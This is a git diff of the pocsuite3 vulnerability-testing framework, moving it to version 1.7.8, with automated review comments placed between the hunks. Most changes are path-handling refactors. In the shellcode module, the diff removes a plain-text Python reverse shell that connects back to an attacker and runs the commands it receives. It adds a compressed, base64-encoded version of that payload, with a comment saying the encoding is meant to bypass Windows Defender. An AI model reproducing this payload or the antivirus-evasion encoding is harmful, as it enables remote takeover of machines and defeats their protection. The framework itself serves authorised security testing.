diff --git a/CHANGELOG.md b/CHANGELOG.md index ec0be004..76b416ab 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -231,4 +231,11 @@ Cross-platform shell code generation # version 1.7.7 ----------------- * 添加--dork自动用poc中的dork字段扫描功能 -* 适配Debian源格式需求 \ No newline at end of file +* 适配Debian源格式需求 + +# version 1.7.8 +----------------- +* add option to display extra parameters of poc +* add more poc attribute to result dict +* allow custom module path in console mode +* fix some compatibility problems diff --git a/docs/CODING.md b/docs/CODING.md index 88d2d3eb..8b398995 100644 --- a/docs/CODING.md +++ b/docs/CODING.md @@ -646,7 +646,7 @@ from pocsuite3.api import get_results def run_pocsuite(): # config 配置可参见命令行参数, 用于初始化 pocsuite3.lib.core.data.conf config = { - 'url': ['http://127.0.0.1:8080', 'http://127.0.0.1:21'] + 'url': ['http://127.0.0.1:8080', 'http://127.0.0.1:21'], 'poc': ['ecshop_rce', 'ftp_burst'] } diff --git a/manpages/poc-console.1 b/manpages/poc-console.1 index af9e9a90..e4df22c9 100644 --- a/manpages/poc-console.1 +++ b/manpages/poc-console.1 @@ -31,7 +31,7 @@ is maintained at: .I https://github.com/knownsec/pocsuite3/blob/master/docs/USAGE.md .PP .SH VERSION -This manual page documents pocsuite version 1.7.7 +This manual page documents pocsuite version 1.7.8 .SH AUTHOR .br (c) 2014-2021 by Knownsec 404 Team diff --git a/manpages/pocsuite.1 b/manpages/pocsuite.1 index 3292a482..9f7b89d7 100644 --- a/manpages/pocsuite.1 +++ b/manpages/pocsuite.1 @@ -250,7 +250,7 @@ is maintained at: .I https://github.com/knownsec/pocsuite3/blob/master/docs/USAGE.md .PP .SH VERSION -This manual page documents pocsuite version 1.7.7 +This manual page documents pocsuite version 1.7.8 .SH AUTHOR .br (c) 2014-2021 by Knownsec 404 Team diff --git a/pocsuite3/__init__.py b/pocsuite3/__init__.py index 445f5d39..ca3401f0 100644 --- a/pocsuite3/__init__.py +++ b/pocsuite3/__init__.py 
@@ -1,5 +1,5 @@ __title__ = 'pocsuite' -__version__ = '1.7.7' +__version__ = '1.7.8' __author__ = 'Knownsec Security Team' __author_email__ = 's1@seebug.org' __license__ = 'GPL 2.0' diff --git a/pocsuite3/lib/core/common.py b/pocsuite3/lib/core/common.py index efc4ef59..78d4a03a 100644 --- a/pocsuite3/lib/core/common.py +++ b/pocsuite3/lib/core/common.py @@ -797,7 +797,7 @@ def ltrim(text, char): return text -def index_modules() -> list: +def index_modules(modules_directory): """ Returns list of all exploits modules :param str modules_directory: path to modules directory @@ -805,8 +805,7 @@ def index_modules() -> list: """ modules = [] - for root, dirs, files in os.walk(paths.POCSUITE_POCS_PATH): - _, package, root = root.rpartition("pocsuite3/pocs/".replace("/", os.sep)) + for root, _, files in os.walk(modules_directory): files = filter(lambda x: not x.startswith("__") and x.endswith(".py"), files) modules.extend(map(lambda x: os.sep.join((root, os.path.splitext(x)[0])), files)) @@ -822,7 +821,7 @@ def humanize_path(path: str) -> str: :return str: humanized path """ - return path.replace(".", "/") + return path.replace(".", os.sep) def pythonize_path(path: str) -> str: @@ -834,7 +833,7 @@ def pythonize_path(path: str) -> str: :return str: pythonized path """ - return path.replace("/", ".") + return path.replace(os.sep, ".") def module_required(fn): diff --git a/pocsuite3/lib/core/interpreter.py b/pocsuite3/lib/core/interpreter.py index 8680a09c..ca0e8981 100644 --- a/pocsuite3/lib/core/interpreter.py +++ b/pocsuite3/lib/core/interpreter.py @@ -171,7 +171,7 @@ class PocsuiteInterpreter(BaseInterpreter): attack Attack target and return target vulnerable infomation exploit Get a shell from remote target""" - def __init__(self): + def __init__(self, module_directory=paths.POCSUITE_POCS_PATH): super(PocsuiteInterpreter, self).__init__() self.current_module = None 
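Review bot: Dropping the parameterless form of `index_modules` in the `@@ -797` hunk is a breaking change for any caller outside this diff that still invokes it with no argument; the interpreter is the only caller this commit updates. Keep the old behaviour as the default and restore the `-> list` annotation the hunk removed: `def index_modules(modules_directory=paths.POCSUITE_POCS_PATH) -> list:` (or `=None` resolved inside the body, if `paths` is populated only after import). `paths` is already used in this module, as the removed `os.walk(paths.POCSUITE_POCS_PATH)` line in the next hunk shows. The body of `index_modules` continues past this hunk.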
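Review bot: `os.walk(modules_directory)` in the `@@ -805` hunk yields nothing and raises nothing when the path does not exist or is not a directory, so a mistyped custom module path now produces an empty module list silently, whereas before the walked location was a fixed known path. Fail early instead: `if not os.path.isdir(modules_directory): raise ValueError("modules directory not found: {0}".format(modules_directory))` before the loop. Whether callers would rather log and continue is not visible here, but an empty result with no diagnostic is the worst of the options for a console user.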
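Review bot: `pythonize_path` in the `@@ -834` hunk now converts only `os.sep`, so on Windows a module path written with forward slashes — which the OS and `os.path` accept — keeps its slashes in what is meant to be a dotted module name; `humanize_path` in the preceding hunk has no such problem since it only produces separators. Handling both forms is one line and a no-op on POSIX: `return path.replace(os.sep, ".").replace("/", ".")`. Whether callers ever pass forward slashes on Windows is not visible in this diff, but the commit's stated goal is compatibility fixes, so it is worth closing.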
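Review bot: `module_directory=paths.POCSUITE_POCS_PATH` in the `@@ -171` hunk is evaluated once, when the class body runs at import of `interpreter.py`; if `paths` is filled in by a setup step that runs later (not visible in this diff), the default is either stale or fails at import. The conventional shape is `def __init__(self, module_directory=None):` followed by `module_directory = module_directory or paths.POCSUITE_POCS_PATH` as the first statement. A smaller style point: the parameter is `module_directory` here but `modules_directory` in `index_modules`; pick one. The rest of `__init__` continues past this hunk.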
@@ -186,7 +186,9 @@ def __init__(self): self.module_commands.extend(self.global_commands) self.module_commands.sort() - self.modules = index_modules() + self.modules = index_modules(module_directory) + self.module_parent_directory = os.sep.join( + module_directory.rstrip(os.sep).split(os.sep)[0:-1]) + os.sep self.modules_count = len(self.modules) # init conf.console_mode = True @@ -198,10 +200,8 @@ def __init__(self): self.main_modules_dirs = [] for module in self.modules: temp_module = module - if IS_WIN: - temp_module = temp_module.replace("/", "\\") - temp_module = temp_module.replace(paths.POCSUITE_ROOT_PATH, "").lstrip("\\") - temp_module = temp_module.replace(paths.POCSUITE_ROOT_PATH, "").lstrip("/") + temp_module = temp_module.replace( + self.module_parent_directory, '').lstrip(os.sep) self.main_modules_dirs.append(temp_module) self.__parse_prompt() @@ -315,7 +315,7 @@ def command_use(self, module_path, *args, **kwargs): if not module_path.endswith(".py"): module_path = module_path + ".py" if not os.path.exists(module_path): - module_path = os.path.join(paths.POCSUITE_ROOT_PATH, module_path) + module_path = os.path.join(self.module_parent_directory, module_path) if not os.path.exists(module_path): errMsg = "No such file: '{0}'".format(module_path) logger.error(errMsg) @@ -323,8 +323,8 @@ def command_use(self, module_path, *args, **kwargs): try: load_file_to_module(module_path) self.current_module = kb.current_poc - self.current_module.pocsuite3_module_path = ltrim(rtrim(module_path, ".py"), - os.path.join(paths.POCSUITE_ROOT_PATH, "")) + self.current_module.pocsuite3_module_path = ltrim( + rtrim(module_path, ".py"), self.module_parent_directory) except Exception as err: logger.error(str(err)) 
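Review bot: The parent-directory computation in the `@@ -186` hunk breaks for a relative `module_directory` with no separator (a console user passing `pocs`): `split(os.sep)[0:-1]` is empty, so `module_parent_directory` becomes bare `os.sep` — the filesystem root — and the `@@ -198` hunk's `temp_module.replace(self.module_parent_directory, '')` then strips every separator out of each module path instead of a prefix. Resolve the path before it is used anywhere: `module_directory = os.path.abspath(module_directory)` ahead of `self.modules = index_modules(module_directory)`, then `self.module_parent_directory = os.path.join(os.path.dirname(module_directory), '')`. The prefix strip in the `@@ -198` hunk should also not be a global `str.replace`; `ltrim`, which this commit already uses for the same purpose in the `@@ -323` hunk, expresses it: `temp_module = ltrim(module, self.module_parent_directory)`. The enclosing `__init__` starts before this hunk.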
@@ -447,7 +447,7 @@ def command_list(self, *args, **kwargs): tb = prettytable.PrettyTable(["Index", "Path", "Name"]) index = 0 for tmp_module in self.main_modules_dirs: - found = os.path.join(paths.POCSUITE_ROOT_PATH, tmp_module + ".py") + found = os.path.join(self.module_parent_directory, tmp_module + ".py") with open(found, encoding='utf-8') as f: code = f.read() name = get_poc_name(code) diff --git a/pocsuite3/shellcodes/python.py b/pocsuite3/shellcodes/python.py index 41133a96..4df5b71a 100644 --- a/pocsuite3/shellcodes/python.py +++ b/pocsuite3/shellcodes/python.py @@ -1,3 +1,5 @@ +import zlib +import base64 from .base import ShellCode @@ -7,7 +9,8 @@ class PythonShellCode(ShellCode): """ def __init__(self, connect_back_ip='localhost', connect_back_port=5555): - ShellCode.__init__(self, connect_back_ip=connect_back_ip, connect_back_port=connect_back_port) + ShellCode.__init__(self, connect_back_ip=connect_back_ip, + connect_back_port=connect_back_port) def get_python_code(self, bad_chars): """ 
@@ -18,34 +21,23 @@ def get_python_code(self, bad_chars): print("Settings for connect back listener must be defined") return False - python_code = """ - #!/usr/bin/python - import socket,subprocess - HOST = '{{LOCALHOST}}' # The remote host - PORT = {{LOCALPORT}} # The same port as used by the server - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - # connect to attacker machine - s.connect((HOST, PORT)) - # send we are connected - s.send('[*] Connection Established!') - # start loop - while 1: - # recieve shell command - data = s.recv(1024) - print data - # if its quit, then break out and close socket - if data == 'quit' or data == 'q': - break - # do shell command - proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - # read output - stdout_value = proc.stdout.read() + proc.stderr.read() - # send output to attacker - s.send(stdout_value) - # close socket - s.close() - """ - + # compress and base64 encode to bypass windows defender + python_code = ( + b'eJxtUsFu2zAMvfsrWORgezOctdhpQA5BkGHFuiZofBuGQLY4' + b'WKgteZKcoijy7yUlNzOK6mLz8fHpkeLiajk6u6yVXg7PvjU6' + b'Uf1grAdnmkf0hRvrwZoGnUt+7A4VrCB9ebnbbdZ3HJ7PKdBZ' + b'QNUiWOyNR2iN88l+98DcicrR+Qzwn+tEjxDuEQ5GhxLqZ/Cc' + b'QHtCmzgqjg7K+MmmaP39eHu/rYq37GG3+Xk8VA/b9a88WUBj' + b'tMbGgzcgvBdEsdCLplUaE1dO2Sxj7wWwrZyrHGoJTwjC4psC' + b'SuIznqW/P/2BTUSV0bB1XtSdci3KqzRUe0F9dMYMyVOrOoTr' + b'b0ns1GKj8ERNtdh1pNz3QsuQk8ILbrEkyim7/nLzNQ/4YJX2' + b'ITtJqL+gvIN/o/IFD0hDbVE8ghlpdOS66YzDaRihhAqiOL0U' + b'V6Vg7AxJozc+QWi6RpoPTPLDs8nLCpR7M6DOWK2I/FVlR6R/' + b'L8nQas683W8DjtZ+iCv9Hs4vUxOS+xvG2FEUP55ENyLZ4ZIy' + b'YiVTsxw+X0C6bQInsfC0UWy+FFE4PvBcP+zQfKS0NByS3itr' + b'QQTj' + ) + python_code = zlib.decompress(base64.b64decode(python_code)).decode() python_code = self.format_shellcode(python_code) return python_code diff --git a/setup.py b/setup.py index 421f40a6..415e68f1 100644 --- a/setup.py +++ b/setup.py 
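Review bot: The zlib/base64 constant introduced here replaces the only readable copy of what `get_python_code` emits, so neither a reviewer of this commit nor a later auditor can confirm its contents without decoding the blob by hand, and any future change to the constant is unreviewable in a diff. Keep the plaintext under version control (a sibling template file or a documented generation step) and point to it from a comment above the constant, e.g. `# Encoded form of <path to the readable template>; regenerate from it rather than editing this constant.` The `.decode()` on the new decompression line also relies on the default codec; `.decode('utf-8')` states the intent. The enclosing `get_python_code` starts before this hunk.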
@@ -7,14 +7,14 @@ def find_packages(where='.'): # os.walk -> list[(dirname, list[subdirs], list[files])] - return [folder.replace("/", ".").lstrip(".") - for (folder, _, fils) in os.walk(where) - if "__init__.py" in fils] + return [folder.replace(os.sep, ".").strip(".") + for (folder, _, files) in os.walk(where) + if "__init__.py" in files] setup( name='pocsuite3', - version='1.7.7', + version='1.7.8', url='http://pocsuite.org', description='Pocsuite is an open-sourced remote vulnerability testing framework developed by the Knownsec Security Team.', long_description="""\